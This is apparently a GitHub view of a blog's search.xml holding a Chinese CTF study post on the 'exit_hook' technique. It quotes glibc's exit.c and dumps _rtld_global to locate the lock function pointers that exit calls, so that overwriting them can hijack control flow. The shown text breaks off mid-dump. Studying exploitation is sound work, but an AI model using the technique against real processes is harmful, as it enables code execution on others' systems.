-
Notifications
You must be signed in to change notification settings - Fork 0
/
search.xml
528 lines (254 loc) · 754 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>PWN学习—exit_hook-偷家</title>
<link href="2021/05/20/PWN%E5%AD%A6%E4%B9%A0%E2%80%94exit-hook-%E5%81%B7%E5%AE%B6/"/>
<url>2021/05/20/PWN%E5%AD%A6%E4%B9%A0%E2%80%94exit-hook-%E5%81%B7%E5%AE%B6/</url>
<content type="html"><![CDATA[<h1 id="PWN学习—exit-hook—悄无声息地偷家"><a href="#PWN学习—exit-hook—悄无声息地偷家" class="headerlink" title="PWN学习—exit_hook—悄无声息地偷家"></a><code>PWN</code>学习—<code>exit_hook</code>—悄无声息地偷家</h1><h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h2><p>在<code>linux</code>下进程最后的最后的最后都是调用<code>exit</code>函数来结束进程,换而言之,所有程序都会调用<code>exit</code>函数。所以针对<code>exit</code>函数的攻击的适用范围也就更加广泛,更加重要。只要能掌控<code>exit</code>函数,那么便掌控了整个进程。</p><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>在程序执行<code>exit</code>函数的时候<code>hook</code>掉它,<code>hook</code>成我们想要的函数,我们便可以控制程序的执行。</p><p>先了解一下什么是<a href="https://blog.csdn.net/sunstars2009918/article/details/39340449"><code>hook</code>技术</a>:函数指针,可以修改。</p><p>那么如何实现<code>exit_hook</code>?</p><p>先看一下<code>exit</code>函数源码(<code>/glibc2.23/stdlib/exit.c</code>):</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Copyright (C) 1991-2016 Free Software Foundation, Inc.</span></span><br><span class="line"><span class="comment"> This file is part of the GNU C Library.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> The GNU C Library is free software; you can redistribute it and/or</span></span><br><span class="line"><span class="comment"> modify it under the terms of the GNU Lesser General Public</span></span><br><span class="line"><span class="comment"> License as published by the Free Software Foundation; either</span></span><br><span class="line"><span class="comment"> version 2.1 of the License, or (at your option) any later version.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> The GNU C Library is distributed in the hope that it will be useful,</span></span><br><span class="line"><span class="comment"> but WITHOUT ANY WARRANTY; without even the implied warranty of</span></span><br><span class="line"><span class="comment"> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU</span></span><br><span class="line"><span class="comment"> Lesser General Public License for more details.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> You should have received a copy of the GNU Lesser General Public</span></span><br><span class="line"><span class="comment"> License along with the GNU C Library; if not, see</span></span><br><span class="line"><span class="comment"> <http://www.gnu.org/licenses/>. */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sysdep.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">"exit.h"</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">"set-hooks.h"</span></span></span><br><span class="line">DEFINE_HOOK (__libc_atexit, (<span class="keyword">void</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">/* Call all functions registered with `atexit' and `on_exit',</span></span><br><span class="line"><span class="comment"> in the reverse of the order in which they were registered</span></span><br><span class="line"><span class="comment"> perform stdio cleanup, and terminate program execution with STATUS. */</span></span><br><span class="line"><span class="keyword">void</span></span><br><span class="line">attribute_hidden</span><br><span class="line">__run_exit_handlers (<span class="keyword">int</span> status, struct exit_function_list **listp,</span><br><span class="line"> <span class="keyword">bool</span> run_list_atexit)</span><br><span class="line">{</span><br><span class="line"> <span class="comment">/* First, call the TLS destructors. */</span></span><br><span class="line"> <span class="meta">#<span class="meta-keyword">ifndef</span> SHARED</span></span><br><span class="line"> <span class="keyword">if</span> (&__call_tls_dtors != <span class="literal">NULL</span>)</span><br><span class="line"> <span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> __call_tls_dtors ();</span><br><span class="line"></span><br><span class="line"> <span class="comment">/* We do it this way to handle recursive calls to exit () made by</span></span><br><span class="line"><span class="comment"> the functions registered with `atexit' and `on_exit'. We call</span></span><br><span class="line"><span class="comment"> everyone on the list and use the status value in the last</span></span><br><span class="line"><span class="comment"> exit (). */</span></span><br><span class="line"> <span class="keyword">while</span> (*listp != <span class="literal">NULL</span>) {</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">exit_function_list</span> *<span class="title">cur</span> =</span> *listp;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> (cur->idx > <span class="number">0</span>){</span><br><span class="line"> <span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">exit_function</span> *<span class="title">const</span> <span class="title">f</span> =</span></span><br><span class="line"> &cur->fns[--cur->idx];</span><br><span class="line"> <span class="keyword">switch</span> (f->flavor){</span><br><span class="line"> <span class="keyword">void</span> (*atfct) (<span class="keyword">void</span>);</span><br><span class="line"> <span class="keyword">void</span> (*onfct) (<span class="keyword">int</span> status, <span class="keyword">void</span> *arg);</span><br><span class="line"> <span class="keyword">void</span> (*cxafct) (<span class="keyword">void</span> *arg, <span class="keyword">int</span> status);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">case</span> ef_free:</span><br><span class="line"> <span class="keyword">case</span> ef_us:</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> ef_on:</span><br><span class="line"> onfct = f->func.on.fn;</span><br><span class="line"> <span class="meta">#i`fd`ef PTR_DEMANGLE</span></span><br><span class="line"> PTR_DEMANGLE (onfct);</span><br><span class="line"> <span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> onfct (status, f->func.on.arg);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> ef_at:</span><br><span class="line"> atfct = f->func.at;</span><br><span class="line"> <span class="meta">#i`fd`ef PTR_DEMANGLE</span></span><br><span class="line"> PTR_DEMANGLE (atfct);</span><br><span class="line"> <span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> atfct ();</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> ef_cxa:</span><br><span class="line"> cxafct = f->func.cxa.fn;</span><br><span class="line"> <span class="meta">#i`fd`ef PTR_DEMANGLE</span></span><br><span class="line"> PTR_DEMANGLE (cxafct);</span><br><span class="line"> <span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"> cxafct (f->func.cxa.arg, status);</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"> *listp = cur->next;</span><br><span class="line"> <span class="keyword">if</span> (*listp != <span class="literal">NULL</span>)</span><br><span class="line"><span class="comment">/* Don't free the last element in the chain, this is the statically</span></span><br><span class="line"><span class="comment"> allocate element. */</span></span><br><span class="line"> <span class="built_in">free</span> (cur);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (run_list_atexit)</span><br><span class="line"> RUN_HOOK (__libc_atexit, ());</span><br><span class="line"> _exit (status);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span></span><br><span class="line"><span class="built_in">exit</span> (<span class="keyword">int</span> status){</span><br><span class="line"> __run_exit_handlers (status, &__exit_funcs, <span class="literal">true</span>);</span><br><span class="line">}</span><br><span class="line">libc_hidden_def (<span class="built_in">exit</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>先看<code>void exit</code>函数,调用<code>__run_exit_handlers</code>函数,<code>__run_exit_handlers</code>的定义就在上面。然后我们动态调试下,看他具体实现过程。</p><p>我们调试看看<code>exit</code>在执行的时候调用那些函数:</p><p><img src="/images/exit/1.png" class="lazyload" data-srcset="/images/exit/1.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517232019480"></p><p>对应上了源码,<code>exit</code>函数调用<code>__run_exit_handlers</code>那一段,然后进入这个函数我们先查看它进行的所有<code>call</code>:</p><p><img src="/images/exit/image-20210517232959154.png" class="lazyload" data-srcset="/images/exit/image-20210517232959154.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517232959154"></p><p><img src="/images/exit/image-20210517233027056.png" class="lazyload" data-srcset="/images/exit/image-20210517233027056.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517233027056"></p><p><img src="/images/exit/image-20210517233437699.png" class="lazyload" data-srcset="/images/exit/image-20210517233437699.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517233437699"></p><p><img src="/images/exit/image-20210517233519274.png" class="lazyload" data-srcset="/images/exit/image-20210517233519274.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517233519274"></p><p><img src="/images/exit/image-20210517233541112.png" class="lazyload" data-srcset="/images/exit/image-20210517233541112.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517233541112"></p><p><code>exit</code>函数先调用<code>__run_exit_handler</code>,然后在<code>__run_exit_handler</code>函数里面调用了 <code>__call_tls_dtors</code>、<code>_dl_fini</code>、<code>_IO_cleanup</code>、<code>_exit</code>函数,最后是在<code>_exit</code>函数里面利用系统调用结束程序。</p><p>下来逐个分析它调用的函数:</p><ul><li> <code>__call_tls_dtors</code></li></ul><p><img src="/images/exit/image-20210517234214952.png" class="lazyload" data-srcset="/images/exit/image-20210517234214952.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517234214952"></p><p>查了查资料,这个函数与<code>TLS(Thread Local Stroage)</code>相关,准确说,它是<code>TLS</code>的一个析构函数。</p><ul><li><code>_dl_fini</code></li></ul><p>这个函数定义在<code>/glibc2.23/elf/dl_fini.c</code>:</p><p>……</p><hr><p>发现代码好长……还是动态调调吧~</p><p>这个函数中先后调用:<code>rtld_lock_default_lock_recursive</code>、<code>_dl_sort_map</code>、<code>rtld_lock_default_unlock_recursive</code>、<code>__do_global_dtors_aux</code>、<code>_fini</code></p><p><img src="/images/exit/image-20210517235621557.png" class="lazyload" data-srcset="/images/exit/image-20210517235621557.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517235621557"></p><p><img src="/images/exit/image-20210517235726706.png" class="lazyload" data-srcset="/images/exit/image-20210517235726706.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210517235726706"></p><p>这里用<code>gdb</code>不是很好看,我们用<code>pwntools+IDA</code>进行调试是很明显可以看出这里的<code>rtld_lock_default_lock_recursive</code>和<code>rtld_lock_default_unlock_recursive</code>是利用函数指针实现的:</p><p><img src="/images/exit/image-20210519165932035.png" class="lazyload" data-srcset="/images/exit/image-20210519165932035.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210519165932035"></p><p><img src="/images/exit/image-20210519165957009.png" class="lazyload" data-srcset="/images/exit/image-20210519165957009.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210519165957009"></p><p><img src="/images/exit/image-20210519170015048.png" class="lazyload" data-srcset="/images/exit/image-20210519170015048.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20210519170015048"></p><p>网上又查了查才知道存储<code>rtld_lock_default_lock_recursive</code>和<code>rtld_lock_default_unlock_recursive</code>的地方是一个函数指针结构体,可以在<code>pwndbg</code>中用<code>p</code>指令查看:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br></pre></td><td class="code"><pre><span class="line">pwndbg> p _rtld_global</span><br><span class="line"><span class="variable">$1</span> = {</span><br><span class="line"> _dl_ns = {{</span><br><span class="line"> _ns_loaded = 0x7ffff7ffe170,</span><br><span class="line"> _ns_nloaded = 4,</span><br><span class="line"> _ns_main_searchlist = 0x7ffff7ffe428,</span><br><span class="line"> _ns_global_scope_alloc = 0,</span><br><span class="line"> _ns_unique_sym_table = {</span><br><span class="line"> lock = {</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 1,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> __list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 16 <span class="built_in">times</span>>, <span class="string">"\001"</span>, <span class="string">'\000'</span> <repeats 22 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> entries = 0x0,</span><br><span class="line"> size = 0,</span><br><span class="line"> n_elements = 0,</span><br><span class="line"> free = 0x0</span><br><span class="line"> },</span><br><span class="line"> _ns_debug = {</span><br><span class="line"> r_version = 0,</span><br><span class="line"> r_map = 0x0,</span><br><span class="line"> r_brk = 0,</span><br><span class="line"> r_state = RT_CONSISTENT,</span><br><span class="line"> r_ldbase = 0</span><br><span class="line"> }</span><br><span class="line"> }, {</span><br><span class="line"> _ns_loaded = 0x0,</span><br><span class="line"> _ns_nloaded = 0,</span><br><span class="line"> _ns_main_searchlist = 0x0,</span><br><span class="line"> _ns_global_scope_alloc = 0,</span><br><span class="line"> _ns_unique_sym_table = {</span><br><span class="line"> lock = {</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 0,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> __list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 39 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> entries = 0x0,</span><br><span class="line"> size = 0,</span><br><span class="line"> n_elements = 0,</span><br><span class="line"> free = 0x0</span><br><span class="line"> },</span><br><span class="line"> _ns_debug = {</span><br><span class="line"> r_version = 0,</span><br><span class="line"> r_map = 0x0,</span><br><span class="line"> r_brk = 0,</span><br><span class="line"> r_state = RT_CONSISTENT,</span><br><span class="line"> r_ldbase = 0</span><br><span class="line"> }</span><br><span class="line"> } <repeats 15 <span class="built_in">times</span>>},</span><br><span class="line"> _dl_nns = 1,</span><br><span class="line"> _dl_load_lock = {</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 1,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> __list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 16 <span class="built_in">times</span>>, <span class="string">"\001"</span>, <span class="string">'\000'</span> <repeats 22 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> _dl_load_write_lock = 